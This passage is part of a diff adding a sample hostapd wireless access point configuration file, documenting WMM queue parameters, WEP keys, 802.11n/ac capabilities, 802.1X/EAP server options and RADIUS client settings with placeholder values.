The format for these 1462+# element(s) is a hexdump of the raw information elements (id+len+payload for 1463+# one or more elements) 1464+#assocresp_elements=dd0411223301 1465+ 1466+# TX queue parameters (EDCF / bursting) 1467+# tx_queue_<queue name>_<param> 1468+# queues: data0, data1, data2, data3, after_beacon, beacon 1469+# (data0 is the highest priority queue) 1470+# parameters: 1471+# aifs: AIFS (default 2) 1472+# cwmin: cwMin (1, 3, 7, 15, 31, 63, 127, 255, 511, 1023, 2047, 4095, 8191, 1473+# 16383, 32767) 1474+# cwmax: cwMax (same values as cwMin, cwMax >= cwMin) 1475+# burst: maximum length (in milliseconds with precision of up to 0.1 ms) for 1476+# bursting 1477+# 1478+# Default WMM parameters (IEEE 802.11 draft; 11-03-0504-03-000e): 1479+# These parameters are used by the access point when transmitting frames 1480+# to the clients. 1481+# 1482+# Low priority / AC_BK = background 1483+#tx_queue_data3_aifs=7 1484+#tx_queue_data3_cwmin=15 1485+#tx_queue_data3_cwmax=1023 1486+#tx_queue_data3_burst=0 1487+# Note: for IEEE 802.11b mode: cWmin=31 cWmax=1023 burst=0 1488+# 1489+# Normal priority / AC_BE = best effort 1490+#tx_queue_data2_aifs=3 1491+#tx_queue_data2_cwmin=15 1492+#tx_queue_data2_cwmax=63 1493+#tx_queue_data2_burst=0 1494+# Note: for IEEE 802.11b mode: cWmin=31 cWmax=127 burst=0 1495+# 1496+# High priority / AC_VI = video 1497+#tx_queue_data1_aifs=1 1498+#tx_queue_data1_cwmin=7 1499+#tx_queue_data1_cwmax=15 1500+#tx_queue_data1_burst=3.0 1501+# Note: for IEEE 802.11b mode: cWmin=15 cWmax=31 burst=6.0 1502+# 1503+# Highest priority / AC_VO = voice 1504+#tx_queue_data0_aifs=1 1505+#tx_queue_data0_cwmin=3 1506+#tx_queue_data0_cwmax=7 1507+#tx_queue_data0_burst=1.5 1508+# Note: for IEEE 802.11b mode: cWmin=7 cWmax=15 burst=3.3 1509+ 1510+# 802.1D Tag (= UP) to AC mappings 1511+# WMM specifies following mapping of data frames to different ACs. This mapping 1512+# can be configured using Linux QoS/tc and sch_pktpri.o module. 
1513+# 802.1D Tag 802.1D Designation Access Category WMM Designation 1514+# 1 BK AC_BK Background 1515+# 2 - AC_BK Background 1516+# 0 BE AC_BE Best Effort 1517+# 3 EE AC_BE Best Effort 1518+# 4 CL AC_VI Video 1519+# 5 VI AC_VI Video 1520+# 6 VO AC_VO Voice 1521+# 7 NC AC_VO Voice 1522+# Data frames with no priority information: AC_BE 1523+# Management frames: AC_VO 1524+# PS-Poll frames: AC_BE 1525+ 1526+# Default WMM parameters (IEEE 802.11 draft; 11-03-0504-03-000e): 1527+# for 802.11a or 802.11g networks 1528+# These parameters are sent to WMM clients when they associate. 1529+# The parameters will be used by WMM clients for frames transmitted to the 1530+# access point. 1531+# 1532+# note - txop_limit is in units of 32microseconds 1533+# note - acm is admission control mandatory flag. 0 = admission control not 1534+# required, 1 = mandatory 1535+# note - Here cwMin and cmMax are in exponent form. The actual cw value used 1536+# will be (2^n)-1 where n is the value given here. The allowed range for these 1537+# wmm_ac_??_{cwmin,cwmax} is 0..15 with cwmax >= cwmin. 
1538+# 1539+wmm_enabled=1 1540+# 1541+# WMM-PS Unscheduled Automatic Power Save Delivery [U-APSD] 1542+# Enable this flag if U-APSD supported outside hostapd (eg., Firmware/driver) 1543+#uapsd_advertisement_enabled=1 1544+# 1545+# Low priority / AC_BK = background 1546+wmm_ac_bk_cwmin=4 1547+wmm_ac_bk_cwmax=10 1548+wmm_ac_bk_aifs=7 1549+wmm_ac_bk_txop_limit=0 1550+wmm_ac_bk_acm=0 1551+# Note: for IEEE 802.11b mode: cWmin=5 cWmax=10 1552+# 1553+# Normal priority / AC_BE = best effort 1554+wmm_ac_be_aifs=3 1555+wmm_ac_be_cwmin=4 1556+wmm_ac_be_cwmax=10 1557+wmm_ac_be_txop_limit=0 1558+wmm_ac_be_acm=0 1559+# Note: for IEEE 802.11b mode: cWmin=5 cWmax=7 1560+# 1561+# High priority / AC_VI = video 1562+wmm_ac_vi_aifs=2 1563+wmm_ac_vi_cwmin=3 1564+wmm_ac_vi_cwmax=4 1565+wmm_ac_vi_txop_limit=94 1566+wmm_ac_vi_acm=0 1567+# Note: for IEEE 802.11b mode: cWmin=4 cWmax=5 txop_limit=188 1568+# 1569+# Highest priority / AC_VO = voice 1570+wmm_ac_vo_aifs=2 1571+wmm_ac_vo_cwmin=2 1572+wmm_ac_vo_cwmax=3 1573+wmm_ac_vo_txop_limit=47 1574+wmm_ac_vo_acm=0 1575+# Note: for IEEE 802.11b mode: cWmin=3 cWmax=4 burst=102 1576+ 1577+# Static WEP key configuration 1578+# 1579+# The key number to use when transmitting. 1580+# It must be between 0 and 3, and the corresponding key must be set. 1581+# default: not set 1582+#wep_default_key=0 1583+# The WEP keys to use. 1584+# A key may be a quoted string or unquoted hexadecimal digits. 1585+# The key length should be 5, 13, or 16 characters, or 10, 26, or 32 1586+# digits, depending on whether 40-bit (64-bit), 104-bit (128-bit), or 1587+# 128-bit (152-bit) WEP is used. 1588+# Only the default key must be supplied; the others are optional. 
1589+# default: not set 1590+#wep_key0=123456789a 1591+#wep_key1="vwxyz" 1592+#wep_key2=0102030405060708090a0b0c0d 1593+#wep_key3=".2.4.6.8.0.23" 1594+ 1595+# Station inactivity limit 1596+# 1597+# If a station does not send anything in ap_max_inactivity seconds, an 1598+# empty data frame is sent to it in order to verify whether it is 1599+# still in range. If this frame is not ACKed, the station will be 1600+# disassociated and then deauthenticated. This feature is used to 1601+# clear station table of old entries when the STAs move out of the 1602+# range. 1603+# 1604+# The station can associate again with the AP if it is still in range; 1605+# this inactivity poll is just used as a nicer way of verifying 1606+# inactivity; i.e., client will not report broken connection because 1607+# disassociation frame is not sent immediately without first polling 1608+# the STA with a data frame. 1609+# default: 300 (i.e., 5 minutes) 1610+#ap_max_inactivity=300 1611+# 1612+# The inactivity polling can be disabled to disconnect stations based on 1613+# inactivity timeout so that idle stations are more likely to be disconnected 1614+# even if they are still in range of the AP. This can be done by setting 1615+# skip_inactivity_poll to 1 (default 0). 1616+#skip_inactivity_poll=0 1617+ 1618+# Disassociate stations based on excessive transmission failures or other 1619+# indications of connection loss. This depends on the driver capabilities and 1620+# may not be available with all drivers. 1621+#disassoc_low_ack=1 1622+ 1623+# Maximum allowed Listen Interval (how many Beacon periods STAs are allowed to 1624+# remain asleep). Default: 65535 (no limit apart from field size) 1625+#max_listen_interval=100 1626+ 1627+# WDS (4-address frame) mode with per-station virtual interfaces 1628+# (only supported with driver=nl80211) 1629+# This mode allows associated stations to use 4-address frames to allow layer 2 1630+# bridging to be used. 
1631+#wds_sta=1 1632+ 1633+# If bridge parameter is set, the WDS STA interface will be added to the same 1634+# bridge by default. This can be overridden with the wds_bridge parameter to 1635+# use a separate bridge. 1636+#wds_bridge=wds-br0 1637+ 1638+# Start the AP with beaconing disabled by default. 1639+#start_disabled=0 1640+ 1641+# Client isolation can be used to prevent low-level bridging of frames between 1642+# associated stations in the BSS. By default, this bridging is allowed. 1643+#ap_isolate=1 1644+ 1645+# BSS Load update period (in BUs) 1646+# This field is used to enable and configure adding a BSS Load element into 1647+# Beacon and Probe Response frames. 1648+#bss_load_update_period=50 1649+ 1650+# Fixed BSS Load value for testing purposes 1651+# This field can be used to configure hostapd to add a fixed BSS Load element 1652+# into Beacon and Probe Response frames for testing purposes. The format is 1653+# <station count>:<channel utilization>:<available admission capacity> 1654+#bss_load_test=12:80:20000 1655+ 1656+##### IEEE 802.11n related configuration ###################################### 1657+ 1658+# ieee80211n: Whether IEEE 802.11n (HT) is enabled 1659+# 0 = disabled (default) 1660+# 1 = enabled 1661+# Note: You will also need to enable WMM for full HT functionality. 1662+# Note: hw_mode=g (2.4 GHz) and hw_mode=a (5 GHz) is used to specify the band. 1663+#ieee80211n=1 1664+ 1665+# ht_capab: HT capabilities (list of flags) 1666+# LDPC coding capability: [LDPC] = supported 1667+# Supported channel width set: [HT40-] = both 20 MHz and 40 MHz with secondary 1668+# channel below the primary channel; [HT40+] = both 20 MHz and 40 MHz 1669+# with secondary channel above the primary channel 1670+# (20 MHz only if neither is set) 1671+# Note: There are limits on which channels can be used with HT40- and 1672+# HT40+. 
Following table shows the channels that may be available for 1673+# HT40- and HT40+ use per IEEE 802.11n Annex J: 1674+# freq HT40- HT40+ 1675+# 2.4 GHz 5-13 1-7 (1-9 in Europe/Japan) 1676+# 5 GHz 40,48,56,64 36,44,52,60 1677+# (depending on the location, not all of these channels may be available 1678+# for use) 1679+# Please note that 40 MHz channels may switch their primary and secondary 1680+# channels if needed or creation of 40 MHz channel maybe rejected based 1681+# on overlapping BSSes. These changes are done automatically when hostapd 1682+# is setting up the 40 MHz channel. 1683+# Spatial Multiplexing (SM) Power Save: [SMPS-STATIC] or [SMPS-DYNAMIC] 1684+# (SMPS disabled if neither is set) 1685+# HT-greenfield: [GF] (disabled if not set) 1686+# Short GI for 20 MHz: [SHORT-GI-20] (disabled if not set) 1687+# Short GI for 40 MHz: [SHORT-GI-40] (disabled if not set) 1688+# Tx STBC: [TX-STBC] (disabled if not set) 1689+# Rx STBC: [RX-STBC1] (one spatial stream), [RX-STBC12] (one or two spatial 1690+# streams), or [RX-STBC123] (one, two, or three spatial streams); Rx STBC 1691+# disabled if none of these set 1692+# HT-delayed Block Ack: [DELAYED-BA] (disabled if not set) 1693+# Maximum A-MSDU length: [MAX-AMSDU-7935] for 7935 octets (3839 octets if not 1694+# set) 1695+# DSSS/CCK Mode in 40 MHz: [DSSS_CCK-40] = allowed (not allowed if not set) 1696+# 40 MHz intolerant [40-INTOLERANT] (not advertised if not set) 1697+# L-SIG TXOP protection support: [LSIG-TXOP-PROT] (disabled if not set) 1698+#ht_capab=[HT40-][SHORT-GI-20][SHORT-GI-40] 1699+ 1700+# Require stations to support HT PHY (reject association if they do not) 1701+#require_ht=1 1702+ 1703+# If set non-zero, require stations to perform scans of overlapping 1704+# channels to test for stations which would be affected by 40 MHz traffic. 1705+# This parameter sets the interval in seconds between these scans. 
Setting this 1706+# to non-zero allows 2.4 GHz band AP to move dynamically to a 40 MHz channel if 1707+# no co-existence issues with neighboring devices are found. 1708+#obss_interval=0 1709+ 1710+##### IEEE 802.11ac related configuration ##################################### 1711+ 1712+# ieee80211ac: Whether IEEE 802.11ac (VHT) is enabled 1713+# 0 = disabled (default) 1714+# 1 = enabled 1715+# Note: You will also need to enable WMM for full VHT functionality. 1716+# Note: hw_mode=a is used to specify that 5 GHz band is used with VHT. 1717+#ieee80211ac=1 1718+ 1719+# vht_capab: VHT capabilities (list of flags) 1720+# 1721+# vht_max_mpdu_len: [MAX-MPDU-7991] [MAX-MPDU-11454] 1722+# Indicates maximum MPDU length 1723+# 0 = 3895 octets (default) 1724+# 1 = 7991 octets 1725+# 2 = 11454 octets 1726+# 3 = reserved 1727+# 1728+# supported_chan_width: [VHT160] [VHT160-80PLUS80] 1729+# Indicates supported Channel widths 1730+# 0 = 160 MHz & 80+80 channel widths are not supported (default) 1731+# 1 = 160 MHz channel width is supported 1732+# 2 = 160 MHz & 80+80 channel widths are supported 1733+# 3 = reserved 1734+# 1735+# Rx LDPC coding capability: [RXLDPC] 1736+# Indicates support for receiving LDPC coded pkts 1737+# 0 = Not supported (default) 1738+# 1 = Supported 1739+# 1740+# Short GI for 80 MHz: [SHORT-GI-80] 1741+# Indicates short GI support for reception of packets transmitted with TXVECTOR 1742+# params format equal to VHT and CBW = 80Mhz 1743+# 0 = Not supported (default) 1744+# 1 = Supported 1745+# 1746+# Short GI for 160 MHz: [SHORT-GI-160] 1747+# Indicates short GI support for reception of packets transmitted with TXVECTOR 1748+# params format equal to VHT and CBW = 160Mhz 1749+# 0 = Not supported (default) 1750+# 1 = Supported 1751+# 1752+# Tx STBC: [TX-STBC-2BY1] 1753+# Indicates support for the transmission of at least 2x1 STBC 1754+# 0 = Not supported (default) 1755+# 1 = Supported 1756+# 1757+# Rx STBC: [RX-STBC-1] [RX-STBC-12] [RX-STBC-123] [RX-STBC-1234] 
1758+# Indicates support for the reception of PPDUs using STBC 1759+# 0 = Not supported (default) 1760+# 1 = support of one spatial stream 1761+# 2 = support of one and two spatial streams 1762+# 3 = support of one, two and three spatial streams 1763+# 4 = support of one, two, three and four spatial streams 1764+# 5,6,7 = reserved 1765+# 1766+# SU Beamformer Capable: [SU-BEAMFORMER] 1767+# Indicates support for operation as a single user beamformer 1768+# 0 = Not supported (default) 1769+# 1 = Supported 1770+# 1771+# SU Beamformee Capable: [SU-BEAMFORMEE] 1772+# Indicates support for operation as a single user beamformee 1773+# 0 = Not supported (default) 1774+# 1 = Supported 1775+# 1776+# Compressed Steering Number of Beamformer Antennas Supported: 1777+# [BF-ANTENNA-2] [BF-ANTENNA-3] [BF-ANTENNA-4] 1778+# Beamformee's capability indicating the maximum number of beamformer 1779+# antennas the beamformee can support when sending compressed beamforming 1780+# feedback 1781+# If SU beamformer capable, set to maximum value minus 1 1782+# else reserved (default) 1783+# 1784+# Number of Sounding Dimensions: 1785+# [SOUNDING-DIMENSION-2] [SOUNDING-DIMENSION-3] [SOUNDING-DIMENSION-4] 1786+# Beamformer's capability indicating the maximum value of the NUM_STS parameter 1787+# in the TXVECTOR of a VHT NDP 1788+# If SU beamformer capable, set to maximum value minus 1 1789+# else reserved (default) 1790+# 1791+# MU Beamformer Capable: [MU-BEAMFORMER] 1792+# Indicates support for operation as an MU beamformer 1793+# 0 = Not supported or sent by Non-AP STA (default) 1794+# 1 = Supported 1795+# 1796+# VHT TXOP PS: [VHT-TXOP-PS] 1797+# Indicates whether or not the AP supports VHT TXOP Power Save Mode 1798+# or whether or not the STA is in VHT TXOP Power Save mode 1799+# 0 = VHT AP doesn't support VHT TXOP PS mode (OR) VHT STA not in VHT TXOP PS 1800+# mode 1801+# 1 = VHT AP supports VHT TXOP PS mode (OR) VHT STA is in VHT TXOP power save 1802+# mode 1803+# 1804+# +HTC-VHT Capable: 
[HTC-VHT] 1805+# Indicates whether or not the STA supports receiving a VHT variant HT Control 1806+# field. 1807+# 0 = Not supported (default) 1808+# 1 = supported 1809+# 1810+# Maximum A-MPDU Length Exponent: [MAX-A-MPDU-LEN-EXP0]..[MAX-A-MPDU-LEN-EXP7] 1811+# Indicates the maximum length of A-MPDU pre-EOF padding that the STA can recv 1812+# This field is an integer in the range of 0 to 7. 1813+# The length defined by this field is equal to 1814+# 2 pow(13 + Maximum A-MPDU Length Exponent) -1 octets 1815+# 1816+# VHT Link Adaptation Capable: [VHT-LINK-ADAPT2] [VHT-LINK-ADAPT3] 1817+# Indicates whether or not the STA supports link adaptation using VHT variant 1818+# HT Control field 1819+# If +HTC-VHTcapable is 1 1820+# 0 = (no feedback) if the STA does not provide VHT MFB (default) 1821+# 1 = reserved 1822+# 2 = (Unsolicited) if the STA provides only unsolicited VHT MFB 1823+# 3 = (Both) if the STA can provide VHT MFB in response to VHT MRQ and if the 1824+# STA provides unsolicited VHT MFB 1825+# Reserved if +HTC-VHTcapable is 0 1826+# 1827+# Rx Antenna Pattern Consistency: [RX-ANTENNA-PATTERN] 1828+# Indicates the possibility of Rx antenna pattern change 1829+# 0 = Rx antenna pattern might change during the lifetime of an association 1830+# 1 = Rx antenna pattern does not change during the lifetime of an association 1831+# 1832+# Tx Antenna Pattern Consistency: [TX-ANTENNA-PATTERN] 1833+# Indicates the possibility of Tx antenna pattern change 1834+# 0 = Tx antenna pattern might change during the lifetime of an association 1835+# 1 = Tx antenna pattern does not change during the lifetime of an association 1836+#vht_capab=[SHORT-GI-80][HTC-VHT] 1837+# 1838+# Require stations to support VHT PHY (reject association if they do not) 1839+#require_vht=1 1840+ 1841+# 0 = 20 or 40 MHz operating Channel width 1842+# 1 = 80 MHz channel width 1843+# 2 = 160 MHz channel width 1844+# 3 = 80+80 MHz channel width 1845+#vht_oper_chwidth=1 1846+# 1847+# center freq = 5 GHz + (5 
* index) 1848+# So index 42 gives center freq 5.210 GHz 1849+# which is channel 42 in 5G band 1850+# 1851+#vht_oper_centr_freq_seg0_idx=42 1852+# 1853+# center freq = 5 GHz + (5 * index) 1854+# So index 159 gives center freq 5.795 GHz 1855+# which is channel 159 in 5G band 1856+# 1857+#vht_oper_centr_freq_seg1_idx=159 1858+ 1859+# Workaround to use station's nsts capability in (Re)Association Response frame 1860+# This may be needed with some deployed devices as an interoperability 1861+# workaround for beamforming if the AP's capability is greater than the 1862+# station's capability. This is disabled by default and can be enabled by 1863+# setting use_sta_nsts=1. 1864+#use_sta_nsts=0 1865+ 1866+##### IEEE 802.1X-2004 related configuration ################################## 1867+ 1868+# Require IEEE 802.1X authorization 1869+#ieee8021x=1 1870+ 1871+# IEEE 802.1X/EAPOL version 1872+# hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL 1873+# version 2. However, there are many client implementations that do not handle 1874+# the new version number correctly (they seem to drop the frames completely). 1875+# In order to make hostapd interoperate with these clients, the version number 1876+# can be set to the older version (1) with this configuration value. 1877+#eapol_version=2 1878+ 1879+# Optional displayable message sent with EAP Request-Identity. The first \0 1880+# in this string will be converted to ASCII-0 (nul). This can be used to 1881+# separate network info (comma separated list of attribute=value pairs); see, 1882+# e.g., RFC 4284. 
1883+#eap_message=hello 1884+#eap_message=hello\0networkid=netw,nasid=foo,portid=0,NAIRealms=example.com 1885+ 1886+# WEP rekeying (disabled if key lengths are not set or are set to 0) 1887+# Key lengths for default/broadcast and individual/unicast keys: 1888+# 5 = 40-bit WEP (also known as 64-bit WEP with 40 secret bits) 1889+# 13 = 104-bit WEP (also known as 128-bit WEP with 104 secret bits) 1890+#wep_key_len_broadcast=5 1891+#wep_key_len_unicast=5 1892+# Rekeying period in seconds. 0 = do not rekey (i.e., set keys only once) 1893+#wep_rekey_period=300 1894+ 1895+# EAPOL-Key index workaround (set bit7) for WinXP Supplicant (needed only if 1896+# only broadcast keys are used) 1897+eapol_key_index_workaround=0 1898+ 1899+# EAP reauthentication period in seconds (default: 3600 seconds; 0 = disable 1900+# reauthentication). 1901+#eap_reauth_period=3600 1902+ 1903+# Use PAE group address (01:80:c2:00:00:03) instead of individual target 1904+# address when sending EAPOL frames with driver=wired. This is the most common 1905+# mechanism used in wired authentication, but it also requires that the port 1906+# is only used by one station. 1907+#use_pae_group_addr=1 1908+ 1909+# EAP Re-authentication Protocol (ERP) authenticator (RFC 6696) 1910+# 1911+# Whether to initiate EAP authentication with EAP-Initiate/Re-auth-Start before 1912+# EAP-Identity/Request 1913+#erp_send_reauth_start=1 1914+# 1915+# Domain name for EAP-Initiate/Re-auth-Start. Omitted from the message if not 1916+# set (no local ER server). This is also used by the integrated EAP server if 1917+# ERP is enabled (eap_server_erp=1). 1918+#erp_domain=example.com 1919+ 1920+##### Integrated EAP server ################################################### 1921+ 1922+# Optionally, hostapd can be configured to use an integrated EAP server 1923+# to process EAP authentication locally without need for an external RADIUS 1924+# server. 
This functionality can be used both as a local authentication server 1925+# for IEEE 802.1X/EAPOL and as a RADIUS server for other devices. 1926+ 1927+# Use integrated EAP server instead of external RADIUS authentication 1928+# server. This is also needed if hostapd is configured to act as a RADIUS 1929+# authentication server. 1930+#eap_server=0 1931+ 1932+# Path for EAP server user database 1933+# If SQLite support is included, this can be set to "sqlite:/path/to/sqlite.db" 1934+# to use SQLite database instead of a text file. 1935+#eap_user_file=/etc/hostapd.eap_user 1936+ 1937+# CA certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS 1938+#ca_cert=/etc/hostapd.ca.pem 1939+ 1940+# Server certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS 1941+#server_cert=/etc/hostapd.server.pem 1942+ 1943+# Private key matching with the server certificate for EAP-TLS/PEAP/TTLS 1944+# This may point to the same file as server_cert if both certificate and key 1945+# are included in a single file. PKCS#12 (PFX) file (.p12/.pfx) can also be 1946+# used by commenting out server_cert and specifying the PFX file as the 1947+# private_key. 1948+#private_key=/etc/hostapd.server.prv 1949+ 1950+# Passphrase for private key 1951+#private_key_passwd=secret passphrase 1952+ 1953+# Server identity 1954+# EAP methods that provide mechanism for authenticated server identity delivery 1955+# use this value. If not set, "hostapd" is used as a default. 1956+#server_id=server.example.com 1957+ 1958+# Enable CRL verification. 1959+# Note: hostapd does not yet support CRL downloading based on CDP. Thus, a 1960+# valid CRL signed by the CA is required to be included in the ca_cert file. 1961+# This can be done by using PEM format for CA certificate and CRL and 1962+# concatenating these into one file. Whenever CRL changes, hostapd needs to be 1963+# restarted to take the new CRL into use. 
1964+# 0 = do not verify CRLs (default) 1965+# 1 = check the CRL of the user certificate 1966+# 2 = check all CRLs in the certificate path 1967+#check_crl=1 1968+ 1969+# TLS Session Lifetime in seconds 1970+# This can be used to allow TLS sessions to be cached and resumed with an 1971+# abbreviated handshake when using EAP-TLS/TTLS/PEAP. 1972+# (default: 0 = session caching and resumption disabled) 1973+#tls_session_lifetime=3600 1974+ 1975+# Cached OCSP stapling response (DER encoded) 1976+# If set, this file is sent as a certificate status response by the EAP server 1977+# if the EAP peer requests certificate status in the ClientHello message. 1978+# This cache file can be updated, e.g., by running following command 1979+# periodically to get an update from the OCSP responder: 1980+# openssl ocsp \ 1981+# -no_nonce \ 1982+# -CAfile /etc/hostapd.ca.pem \ 1983+# -issuer /etc/hostapd.ca.pem \ 1984+# -cert /etc/hostapd.server.pem \ 1985+# -url http://ocsp.example.com:8888/ \ 1986+# -respout /tmp/ocsp-cache.der 1987+#ocsp_stapling_response=/tmp/ocsp-cache.der 1988+ 1989+# Cached OCSP stapling response list (DER encoded OCSPResponseList) 1990+# This is similar to ocsp_stapling_response, but the extended version defined in 1991+# RFC 6961 to allow multiple OCSP responses to be provided. 1992+#ocsp_stapling_response_multi=/tmp/ocsp-multi-cache.der 1993+ 1994+# dh_file: File path to DH/DSA parameters file (in PEM format) 1995+# This is an optional configuration file for setting parameters for an 1996+# ephemeral DH key exchange. In most cases, the default RSA authentication does 1997+# not use this configuration. However, it is possible setup RSA to use 1998+# ephemeral DH key exchange. In addition, ciphers with DSA keys always use 1999+# ephemeral DH keys. This can be used to achieve forward secrecy. If the file 2000+# is in DSA parameters format, it will be automatically converted into DH 2001+# params. This parameter is required if anonymous EAP-FAST is used. 
2002+# You can generate DH parameters file with OpenSSL, e.g., 2003+# "openssl dhparam -out /etc/hostapd.dh.pem 2048" 2004+#dh_file=/etc/hostapd.dh.pem 2005+ 2006+# OpenSSL cipher string 2007+# 2008+# This is an OpenSSL specific configuration option for configuring the default 2009+# ciphers. If not set, "DEFAULT:!EXP:!LOW" is used as the default. 2010+# See https://www.openssl.org/docs/apps/ciphers.html for OpenSSL documentation 2011+# on cipher suite configuration. This is applicable only if hostapd is built to 2012+# use OpenSSL. 2013+#openssl_ciphers=DEFAULT:!EXP:!LOW 2014+ 2015+# Fragment size for EAP methods 2016+#fragment_size=1400 2017+ 2018+# Finite cyclic group for EAP-pwd. Number maps to group of domain parameters 2019+# using the IANA repository for IKE (RFC 2409). 2020+#pwd_group=19 2021+ 2022+# Configuration data for EAP-SIM database/authentication gateway interface. 2023+# This is a text string in implementation specific format. The example 2024+# implementation in eap_sim_db.c uses this as the UNIX domain socket name for 2025+# the HLR/AuC gateway (e.g., hlr_auc_gw). In this case, the path uses "unix:" 2026+# prefix. If hostapd is built with SQLite support (CONFIG_SQLITE=y in .config), 2027+# database file can be described with an optional db=<path> parameter. 2028+#eap_sim_db=unix:/tmp/hlr_auc_gw.sock 2029+#eap_sim_db=unix:/tmp/hlr_auc_gw.sock db=/tmp/hostapd.db 2030+ 2031+# EAP-SIM DB request timeout 2032+# This parameter sets the maximum time to wait for a database request response. 2033+# The parameter value is in seconds. 2034+#eap_sim_db_timeout=1 2035+ 2036+# Encryption key for EAP-FAST PAC-Opaque values. This key must be a secret, 2037+# random value. It is configured as a 16-octet value in hex format. 
It can be 2038+# generated, e.g., with the following command: 2039+# od -tx1 -v -N16 /dev/random | colrm 1 8 | tr -d ' ' 2040+#pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f 2041+ 2042+# EAP-FAST authority identity (A-ID) 2043+# A-ID indicates the identity of the authority that issues PACs. The A-ID 2044+# should be unique across all issuing servers. In theory, this is a variable 2045+# length field, but due to some existing implementations requiring A-ID to be 2046+# 16 octets in length, it is strongly recommended to use that length for the 2047+# field to provid interoperability with deployed peer implementations. This 2048+# field is configured in hex format. 2049+#eap_fast_a_id=101112131415161718191a1b1c1d1e1f 2050+ 2051+# EAP-FAST authority identifier information (A-ID-Info) 2052+# This is a user-friendly name for the A-ID. For example, the enterprise name 2053+# and server name in a human-readable format. This field is encoded as UTF-8. 2054+#eap_fast_a_id_info=test server 2055+ 2056+# Enable/disable different EAP-FAST provisioning modes: 2057+#0 = provisioning disabled 2058+#1 = only anonymous provisioning allowed 2059+#2 = only authenticated provisioning allowed 2060+#3 = both provisioning modes allowed (default) 2061+#eap_fast_prov=3 2062+ 2063+# EAP-FAST PAC-Key lifetime in seconds (hard limit) 2064+#pac_key_lifetime=604800 2065+ 2066+# EAP-FAST PAC-Key refresh time in seconds (soft limit on remaining hard 2067+# limit). The server will generate a new PAC-Key when this number of seconds 2068+# (or fewer) of the lifetime remains. 2069+#pac_key_refresh_time=86400 2070+ 2071+# EAP-SIM and EAP-AKA protected success/failure indication using AT_RESULT_IND 2072+# (default: 0 = disabled). 2073+#eap_sim_aka_result_ind=1 2074+ 2075+# Trusted Network Connect (TNC) 2076+# If enabled, TNC validation will be required before the peer is allowed to 2077+# connect. Note: This is only used with EAP-TTLS and EAP-FAST. 
If any other 2078+# EAP method is enabled, the peer will be allowed to connect without TNC. 2079+#tnc=1 2080+ 2081+# EAP Re-authentication Protocol (ERP) - RFC 6696 2082+# 2083+# Whether to enable ERP on the EAP server. 2084+#eap_server_erp=1 2085+ 2086+##### IEEE 802.11f - Inter-Access Point Protocol (IAPP) ####################### 2087+ 2088+# Interface to be used for IAPP broadcast packets 2089+#iapp_interface=eth0 2090+ 2091+ 2092+##### RADIUS client configuration ############################################# 2093+# for IEEE 802.1X with external Authentication Server, IEEE 802.11 2094+# authentication with external ACL for MAC addresses, and accounting 2095+ 2096+# The own IP address of the access point (used as NAS-IP-Address) 2097+own_ip_addr=127.0.0.1 2098+ 2099+# NAS-Identifier string for RADIUS messages. When used, this should be unique 2100+# to the NAS within the scope of the RADIUS server. Please note that hostapd 2101+# uses a separate RADIUS client for each BSS and as such, a unique 2102+# nas_identifier value should be configured separately for each BSS. This is 2103+# particularly important for cases where RADIUS accounting is used 2104+# (Accounting-On/Off messages are interpreted as clearing all ongoing sessions 2105+# and that may get interpreted as applying to all BSSes if the same 2106+# NAS-Identifier value is used.) For example, a fully qualified domain name 2107+# prefixed with a unique identifier of the BSS (e.g., BSSID) can be used here. 2108+# 2109+# When using IEEE 802.11r, nas_identifier must be set and must be between 1 and 2110+# 48 octets long. 2111+# 2112+# It is mandatory to configure either own_ip_addr or nas_identifier to be 2113+# compliant with the RADIUS protocol. When using RADIUS accounting, it is 2114+# strongly recommended that nas_identifier is set to a unique value for each 2115+# BSS. 
2116+#nas_identifier=ap.example.com 2117+ 2118+# RADIUS client forced local IP address for the access point 2119+# Normally the local IP address is determined automatically based on configured 2120+# IP addresses, but this field can be used to force a specific address to be 2121+# used, e.g., when the device has multiple IP addresses. 2122+#radius_client_addr=127.0.0.1 2123+ 2124+# RADIUS authentication server 2125+#auth_server_addr=127.0.0.1 2126+#auth_server_port=1812 2127+#auth_server_shared_secret=secret 2128+ 2129+# RADIUS accounting server 2130+#acct_server_addr=127.0.0.1 2131+#acct_server_port=1813 2132+#acct_server_shared_secret=secret 2133+ 2134+# Secondary RADIUS servers; to be used if primary one does not reply to 2135+# RADIUS packets. These are optional and there can be more than one secondary 2136+# server listed. 2137+#auth_server_addr=127.0.0.2 2138+#auth_server_port=1812 2139+#auth_server_shared_secret=secret2 2140+# 2141+#acct_server_addr=127.0.0.2 2142+#acct_server_port=1813 2143+#acct_server_shared_secret=secret2 2144+ 2145+# Retry interval for trying to return to the primary RADIUS server (in 2146+# seconds). RADIUS client code will automatically try to use the next server 2147+# when the current server is not replying to requests. If this interval is set, 2148+# primary server will be retried after configured amount of time even if the 2149+# currently used secondary server is still working. 2150+#radius_retry_primary_interval=600 2151+ 2152+ 2153+# Interim accounting update interval 2154+# If this is set (larger than 0) and acct_server is configured, hostapd will 2155+# send interim accounting updates every N seconds. Note: if set, this overrides 2156+# possible Acct-Interim-Interval attribute in Access-Accept message. Thus, this 2157+# value should not be configured in hostapd.conf, if RADIUS server is used to 2158+# control the interim interval. 
2159+# This value should not be less 600 (10 minutes) and must not be less than 2160+# 60 (1 minute). 2161+#radius_acct_interim_interval=600 2162+ 2163+# Request Chargeable-User-Identity (RFC 4372) 2164+# This parameter can be used to configure hostapd to request CUI from the 2165+# RADIUS server by including Chargeable-User-Identity attribute into 2166+# Access-Request packets. 2167+#radius_request_cui=1 2168+ 2169+# Dynamic VLAN mode; allow RADIUS authentication server to decide which VLAN 2170+# is used for the stations. This information is parsed from following RADIUS 2171+# attributes based on RFC 3580 and RFC 2868: Tunnel-Type (value 13 = VLAN), 2172+# Tunnel-Medium-Type (value 6 = IEEE 802), Tunnel-Private-Group-ID (value 2173+# VLANID as a string). Optionally, the local MAC ACL list (accept_mac_file) can 2174+# be used to set static client MAC address to VLAN ID mapping. 2175+# 0 = disabled (default) 2176+# 1 = option; use default interface if RADIUS server does not include VLAN ID 2177+# 2 = required; reject authentication if RADIUS server does not include VLAN ID 2178+#dynamic_vlan=0 2179+ 2180+# Per-Station AP_VLAN interface mode 2181+# If enabled, each station is assigned its own AP_VLAN interface. 2182+# This implies per-station group keying and ebtables filtering of inter-STA 2183+# traffic (when passed through the AP). 2184+# If the sta is not assigned to any 